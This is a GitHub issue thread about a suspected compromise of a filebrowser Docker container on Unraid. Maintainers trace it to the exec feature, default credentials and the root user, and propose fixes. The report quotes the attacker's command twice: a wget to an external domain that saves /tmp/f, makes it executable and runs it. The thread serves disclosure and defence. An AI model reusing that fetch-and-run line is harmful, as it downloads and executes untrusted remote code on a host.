Security issue: Docker container tries to execute file from shady external domain

[mistermalek]

Potential Security Issue in Docker Image

Hi team,

I’ve encountered what seems to be a security compromise in the Docker container I pulled via the Unraid Community Apps for filebrowser/filebrowser.

Here’s what happened:

• The container (named FileBrowser-PNP on my Unraid) was trying to download and execute a file from a shady domain: https://aws.orgserv.dnsnet.cloud.anondns.net
• • The container logs showed repeated attempts like: Blocking Command: “wget -qO /tmp/f https://aws.orgserv.dnsnet.cloud.anondns.net”
    chmod +x /tmp/f
    sh /tmp/f
• When I inspected the container manually (docker exec), I found an unauthorized binary named /CmdgQvxO running persistently as root.
• This binary was removed and the image deleted immediately for security reasons.

Image details:

• Repo: filebrowser/filebrowser
• Installed via: Unraid Community Applications
• SHA256 digest: Not available — the image was deleted immediately after identifying suspicious activity, and no SHA could be recovered from logs or diagnostics.
• Installed plugins: only community-trusted ones like Community Applications, Compose Manager, intel-gpu-top, Theme Engine, Unraid Patch, etc.

Thanks.

[gtsteffaniak]

Yeah, it's a major security issue. You should disable exec on your configuration:

filebrowser config set --disable-exec=true

Imagine a user uploads a malicious binary such as CmdgQvxO, then they could use command runners to execute the malicious code. And as far as the docker container goes, filebrowser defaults to root user. It's a huge vulnerability that exists by default.

[mistermalek]

Thanks for your reply!
It’s actually reassuring to know that others experienced the same issue — I wasn’t sure if I was the only one.

To be honest, I switched to Cloud Commander for now, just to be safe.
But if this major security issue gets properly patched and reviewed, I’ll definitely consider coming back to FileBrowser.

Thanks again for the follow-up!

[Krzysztofz01]

Was your instance configured in such a way that it was accessible, for example, only on the local network or via VPN, to selected people. Or was it publicly accessible, to more users. Given an earlier case where public instances with default authentication credentials were attacked, by injecting cryptocurrency miners, one could determine whether it was the fault of the image you pulled, or attempts to attack your instance.

[xX-MrN0b0dy-Xx]

Potential Security Issue in Docker Image

Hi team,

I’ve encountered what seems to be a security compromise in the Docker container I pulled via the Unraid Community Apps for filebrowser/filebrowser.

Here’s what happened:

• The container (named FileBrowser-PNP on my Unraid) was trying to download and execute a file from a shady domain: https://aws.orgserv.dnsnet.cloud.anondns.net
• • The container logs showed repeated attempts like: Blocking Command: “wget -qO /tmp/f https://aws.orgserv.dnsnet.cloud.anondns.net”
    chmod +x /tmp/f
    sh /tmp/f
• When I inspected the container manually (docker exec), I found an unauthorized binary named /CmdgQvxO running persistently as root.
• This binary was removed and the image deleted immediately for security reasons.

Image details:

• Repo: filebrowser/filebrowser
• Installed via: Unraid Community Applications
• SHA256 digest: Not available — the image was deleted immediately after identifying suspicious activity, and no SHA could be recovered from logs or diagnostics.
• Installed plugins: only community-trusted ones like Community Applications, Compose Manager, intel-gpu-top, Theme Engine, Unraid Patch, etc.

Thanks.

I am currently using filebrowser with no problems behind an nginx reverse proxy and to immediately disable this feature everytime a container is created (ie if u pull a new update or whatever), I adopted this workaround modifying the entrypoint:

entrypoint: ["sh","-c","/filebrowser config set --disable-exec=true && /filebrowser"]

[jniggemann]

You describe a possibly malicious behavior in the Unraid app "filebrowser-PNP", which we can not verify, because we don't use unraid.

$\color{Red}{\textsf{Important: The filebrowser project does not provide this image. It is an Unraid third-party community app.}}$

We can't know if some unexperienced user had opened the application to the internet and that the (possibly) malicious binary came from there, or if it's already included by a malicious actor in the unraid app.

I have contacted the Lime security team (the company behind Unraid) and am waiting for feedback.

[Squidly271]

@jniggemann This is not an issue with Unraid. If there is a security issue with the container, then the issue lies with you.

Unraid's "apps" are nothing more that xml templates which ultimately generate an applicable docker run command. The template is https://raw.githubusercontent.com/logandwaters/Plug-and-Play-Docker/master/file_browser_pnp/file_browser_pnp.xml and this generates a docker run command of
docker run -d --name='FileBrowser-PNP' --net='bridge' --pids-limit 2048 -e TZ="America/New_York" -e HOST_OS="Unraid" -e HOST_HOSTNAME="unRaidA" -e HOST_CONTAINERNAME="FileBrowser-PNP" -e 'CA_TS_FALLBACK_DIR'='/db' -l net.unraid.docker.managed=dockerman -l net.unraid.docker.webui='http://[ip]:[port:80]/' -l net.unraid.docker.icon='https://raw.githubusercontent.com/logandwaters/Plug-and-Play-Docker/refs/heads/main/file_browser_pnp/logo.png' -p '8080:80/tcp' -v '/blah':'/srv':'rw' -v '/mnt/user/appdata/filebrowser/db':'/db':'rw' 'filebrowser/filebrowser'

It simply pulls the official docker container filebrowser/filebrowser and adds in the appropriate ports and volumes.

In the meantime, I have blacklisted this container with Apps in Unraid, and via another module of Unraid every user who has this container installed will get a notification indicating that the container has been blacklisted due to a major security issue.

Due to the copious number of notifications I receive from GitHub, if this is in error then reply back to the ticket which you created with Unraid.

A

[Renegade605]

Other than removing the container is there anything we should do to to ensure the security of our systems?

[jniggemann]

We have no reason to beleive that our official Docker image contains malware.

The person posting this issue probably didn't applay proper operational security and got hacked. We're currently improving the default settings to tighten security, these changes will proabably go into the next release.

[xX-MrN0b0dy-Xx]

See #4893 and the issues I cited. I think it's just due to command execution feature + default admin:admin credentials or something like that, on the instance run by OP

[hacdias]

Thanks @xX-MrN0b0dy-Xx. The default credentials have been updated in #3675. I will try releasing it this week(end). I agree with you, and even further:

• Make external command execution opt-in for new users. Not sure how this would need to be implemented to ensure that current users don't have a breaking change. I think making it opt-in reduces the risk of this feature a lot.
• Use a different user other than root in the Docker image